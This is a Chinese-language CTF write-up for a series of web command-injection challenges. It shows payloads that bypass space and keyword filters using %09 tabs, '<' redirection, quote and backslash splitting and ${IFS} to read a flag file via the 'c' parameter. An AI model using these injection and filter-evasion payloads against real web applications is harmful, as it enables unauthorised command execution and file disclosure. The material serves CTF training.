web45

过滤了空格，用%09绕过，&&等于;，也可以用||和%0a。
payload:

1
2
3

/?c=tac%09fl*||
/?c=sort%09fl*||
/?c=echo%09`tac%09fla*`||

web46

多过滤了一些字符，但还是可以%09过滤空格，因为%09解码后就不是数字了，是一个水平制表符。
*被过滤了，可以用?
payload:

1 2	/?c=tac%09fla?.php\|\| /?c=nl<fla''g.php\|\| nl查看源代码，<代替空格，''分割flag过滤，\|\|解决命令黑洞

无非就是sort无法用了，上一题的payload还可以用。

上一题的payload依然可以用。

依然可以用。

%09过滤了，<>和?一起使用时没有回显,所以这里的?可以用\和''进行代替,。
paylaod:

1 2	/?c=tac<fla\g.php\|\| /?c=nl<fla''g.php\|\|

tac被过滤了，只能用nl。
payload:

1	?c=nl<fla\g.php\|\|

<>也被过滤了，还可以用$IFS
payload:

1	/?c=nl${IFS}fla\g.php\|\|